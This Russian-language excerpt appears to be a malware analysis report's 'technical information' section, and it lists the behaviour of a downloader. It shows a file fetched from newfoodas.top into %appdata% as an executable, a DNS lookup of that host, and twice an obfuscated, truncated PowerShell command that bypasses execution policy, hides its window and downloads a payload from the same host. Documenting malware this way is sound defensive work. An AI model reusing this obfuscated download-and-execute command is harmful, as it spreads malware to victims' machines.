Техническая информация
- http://newfoodas.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "p^O^weRs^hEl^L^.^EXe^ -^ExecuTIon^pOL^iC^Y by^PA^sS^ -N^OPrOf^ilE -wiN^dOw^stYLE^ ^hidDEN ^(^NEw-OBjeCt^ sYste^M.^N^et.^wEbcl^IEn^t)^.^D^oW^NL^OAd^F^I^lE^('http://newfoodas.top/read....
- DNS ASK ne###odas.top
- '<SYSTEM32>\cmd.exe' /c "p^O^weRs^hEl^L^.^EXe^ -^ExecuTIon^pOL^iC^Y by^PA^sS^ -N^OPrOf^ilE -wiN^dOw^stYLE^ ^hidDEN ^(^NEw-OBjeCt^ sYste^M.^N^et.^wEbcl^IEn^t)^.^D^oW^NL^OAd^F^I^lE^('http://newfoodas.top/read....' (со скрытым окном)